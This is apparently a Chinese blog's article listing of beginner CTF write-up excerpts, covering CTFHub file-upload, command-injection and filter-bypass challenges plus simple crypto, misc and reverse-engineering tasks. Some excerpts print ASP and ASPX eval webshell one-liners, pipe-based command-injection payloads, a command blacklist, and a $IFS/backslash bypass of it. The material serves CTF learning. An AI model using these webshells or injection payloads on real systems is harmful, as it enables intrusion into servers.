- 博客(19)
- 收藏
- 关注
原创 第四周实训作业
ctfhub技能树ctfhub技能树基础知识和签到模块这几个题都很基础打开题目附件(附件里面是一些关于的知识),直接查看页面源代码,用F12或Ctrl+F搜索flag即可得到flag,但是要注意修改格式。
2024-11-30 03:19:09
1819
原创 CTFHub 文件上传 - 无限制
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");发现要上传文件,并且没有限制。php的一句话木马: <?asp的一句话是: <%eval request ("pass")%>然后添加,打开查看,寻找flag。打开环境,题目为无限制。
2024-11-21 19:51:30
362
原创 CTFHub 技能树 基础知识 签到
这几个题都很基础打开题目附件(附件里面是一些关于CTF的知识),直接查看源代码,搜索flag即可,但是要注意修改格式。
2024-11-20 21:03:38
311
原创 CTFHub 过滤cat
在IP里随便Ping一个,我Ping的是127.0.0.1 ,然后得到。继续在|ls的后面输入|tac flag_182532733224108.php。在页面上方地址栏中输入|ls(注:将地址栏最后的#删掉),回车得到。这题做法和前面一题命令注入一样。查看源代码,即可得到flag。
2024-11-14 21:58:09
240
原创 CTFHub 命令注入
在IP里随便Ping一个,我Ping的是127.0.0.1 ,然后得到。继续在|ls的后面输入|tac 2370392316431.php ,回车得到。在页面上方地址栏中输入|ls(注:将地址栏最后的#删掉),回车得到。查看源代码,即可得到flag。
2024-11-14 21:46:55
210
原创 Bugku POST
打开hackbar,粘贴网址,点击Post data,填入what=flag,点击execute,就可以得到flag。尝试用了之前get请求的做法,发现不行。这个题要用到工具hackbar。
2024-11-12 22:23:03
286
原创 眼见非实MISC
丢进010 Editor试试(我的文件是压缩过的,所以是zip文件)然后用虚拟机打开(从网上一些大佬那里学的...)打开题目,下载附件,打开后一群乱码。看一下图,就可以找到flag。点击第一个·,然后得到。
2024-11-06 21:35:21
211
原创 /.-Crypto
提交答案时,将FLAG改为flag,%u7b和%u7d该为{},其余大写字母都改为小写字母。flag为flag{d3fcbf17f9399504}用摩斯密码解密工具解码即可得到flag。问了AI后,了解到这是摩斯密码。
2024-11-06 20:49:52
251
原创 计算器WEB
进去后发现计算的答案只能输一个数字,所以应该是要篡改源代码使输入栏可以输入多个数字,然后我们点击F12(或Crl+U)查看源代码,分析源代码可以知道设置了一个字节,找到maxlength="1",双击把1换成其他数字(根据你的计算结果的位数改)也可以直接点击刷新所给计算式子,直至出现计算结果为一位数的计算式子时停止,此时填入答案,即可得到flag.启动场景,打开所给网页。
2024-11-05 13:15:03
226
原创 [LitCTF 2023]404notfound (初级)
酥邐 sRGB ?xpacket begin='锘?由上面的内容{Its_404_but_1ts_n0t_a_page}可知,它即为flag。然后我解压附件,在记事本查看,得到一个新文件。下载附件,打开后是一张图片。
2024-11-02 14:36:43
402
原创 [SWPUCTF 2021 新生赛]crypto6
首先用base16解码得到JZLVK6CNKRATKT2ENN2FUR2NGBGXSMDYLFWVC6SMKRAXOWLKKF2E6VCBO5HVISLXJZVEKMKPI5NGY===最后用base64解码得到5e110989-dc43-1bd3-00b4-9009206158fe即可得出flag。可知该题目对flag依次进行了base64,base32,base16的加密,所以只需要反向解码即可。即base16,base32,base64的解码。搜索别人的wp,得到一个解码网站。
2024-11-02 14:14:15
241
1
原创 [SWPUCTF 2021 新生赛]re1
(注:这个题是一个星期前在606做的,所以没图。对于Re题,先将附件用脱壳软件看看有没有壳。将4换成a,3换成e即可得到flag。会发现它是使用ASCII编码互换的。用IDA打开,查看代码。
2024-11-02 13:59:00
195
原创 [SWPUCTF 2021 新生赛]nc签到
输入l\s命令读取,绕过黑名单blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']打开虚拟机,将附件拖到虚拟机里,打开kali(root模式),用nc连接附件(注:cn后的:要改为空格)最后输入c\a\t$IFS$5f\l\a\g即可得到flag(注:$IFS$5表示空格,绕过黑名单)这个我也看不懂,然后从网上了解到要用虚拟机做。开始做题,先下载文件,然后打开查看。
2024-11-02 13:25:43
489
原创 [SWPUCTF 2021 新生赛]gift_F12
然后按照网上网友的提示,先用Ctrl+u找到源代码,再用Ctrl+F搜索flag,就可以得到答案。打开页面开始做题,先复制题目进行搜索。最后按照题目要求提交答案即可。然后得到这样一个页面。
2024-10-24 13:40:41
207
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅